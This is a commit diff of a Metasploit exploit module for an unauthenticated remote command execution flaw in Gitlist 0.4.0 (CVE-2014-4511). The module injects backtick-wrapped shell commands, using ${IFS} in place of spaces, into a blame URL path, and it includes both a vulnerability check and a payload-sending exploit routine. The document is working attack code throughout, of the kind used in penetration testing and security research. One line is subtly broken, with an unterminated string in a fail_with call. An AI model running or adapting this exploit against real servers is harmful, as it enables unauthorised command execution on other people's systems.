@@ -12,35 +12,36 @@ class Metasploit3 < Msf::Exploit::Remote
1212
1313 def initialize ( info = { } )
1414 super ( update_info ( info ,
15- 'Name' => 'Gitlist Unauthenticated Command Execution' ,
15+ 'Name' => 'Gitlist Unauthenticated Remote Command Execution' ,
1616 'Description' => %q{
17- This module exploits an unauthenticated remote command execution vulnerability
18- in version 0.4.0 of Gitlist.
17+ This module exploits an unauthenticated remote command execution vulnerability
18+ in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
19+ crafted file name when trying to blame it.
1920 } ,
2021 'License' => MSF_LICENSE ,
2122 'Privileged' => false ,
2223 'Platform' => 'unix' ,
2324 'Arch' => ARCH_CMD ,
2425 'Author' =>
2526 [
26- '@dronesec ' , #discovery/poc
27+ 'drone ' , #discovery/poc by @dronesec
2728 'Brandon Perry <[email protected] >' #Metasploit module 2829 ] ,
2930 'References' =>
3031 [
3132 [ 'CVE' , '2014-4511' ] ,
32- [ 'URL ' , 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ ' ] ,
33- [ 'EDB ' , '33929 ' ]
33+ [ 'EDB ' , '33929 ' ] ,
34+ [ 'URL ' , 'http://hatriot.github.io/blog/2014/06/29/gitlist-rce/ ' ]
3435 ] ,
3536 'Payload' =>
3637 {
37- 'Space' => 9999 , #arbitrary, length of GET request really
38- 'BadChars' => "&\x20 " ,
38+ 'Space' => 8192 , # max length of GET request really
39+ 'BadChars' => "&\x20 " ,
3940 'DisableNops' => true ,
4041 'Compat' =>
4142 {
4243 'PayloadType' => 'cmd' ,
43- 'RequiredCmd' => 'generic telnet python perl bash' ,
44+ 'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl ' ,
4445 }
4546 } ,
4647 'Targets' =>
@@ -58,43 +59,61 @@ def initialize(info = {})
5859 end
5960
6061 def check
62+ repo = get_repo
63+
64+ if repo . nil?
65+ return Exploit ::CheckCode ::Unknown
66+ end
67+
6168 chk = Rex ::Text . encode_base64 ( rand_text_alpha ( rand ( 32 ) +5 ) )
6269
63- res = send_command ( "echo${IFS}" + chk + "|base64${IFS}--decode" )
70+ res = send_command ( repo , "echo${IFS}" + chk + "|base64${IFS}--decode" )
6471
65- if res && res . body . include? ( Rex ::Text . decode_base64 ( chk ) )
66- return Exploit ::CheckCode ::Vulnerable
72+ if res && res . body
73+ if res . body . include? ( Rex ::Text . decode_base64 ( chk ) )
74+ return Exploit ::CheckCode ::Vulnerable
75+ elsif res . body . to_s =~ /sh.*not found/
76+ return Exploit ::CheckCode ::Vulnerable
77+ end
6778 end
6879
69- return Exploit ::CheckCode ::Safe
80+ Exploit ::CheckCode ::Safe
7081 end
7182
7283 def exploit
73- send_command ( payload . encoded )
84+ repo = get_repo
85+ if repo . nil?
86+ fail_with ( Failure ::Unknown , "#{ peer } )
87+ end
88+ send_command ( repo , payload . encoded )
7489 end
7590
76- def send_command ( cmd )
91+ def get_repo
7792 res = send_request_cgi ( {
78- 'uri' => normalize_uri ( target_uri . path )
93+ 'uri' => normalize_uri ( target_uri . path , "/" )
7994 } )
8095
8196 unless res
82- fail_with ( "Server did not respond in an expected way" )
97+ return nil
8398 end
8499
85- first = /href="\/ gitlist\/ (.*)\/ "/ . match ( res . body )
100+ first_repo = /href="\/ gitlist\/ (.*)\/ "/ . match ( res . body )
86101
87- unless first && first . length >= 2
88- fail_with ( "We don't have a properly configured Gitlist installation" )
102+ unless first_repo && first_repo . length >= 2
103+ return nil
89104 end
90105
91- first = first [ 1 ]
106+ repo_name = first_repo [ 1 ]
92107
108+ repo_name
109+ end
110+
111+ def send_command ( repo , cmd )
93112 res = send_request_cgi ( {
94- 'uri' => normalize_uri ( target_uri . path , first , 'blame' , 'master' , '""`' + cmd + '`' )
95- } )
113+ 'uri' => normalize_uri ( target_uri . path , repo , 'blame' , 'master' , '""`' + cmd + '`' )
114+ } , 1 )
96115
97- return res
116+ res
98117 end
99118
100119end
0 commit comments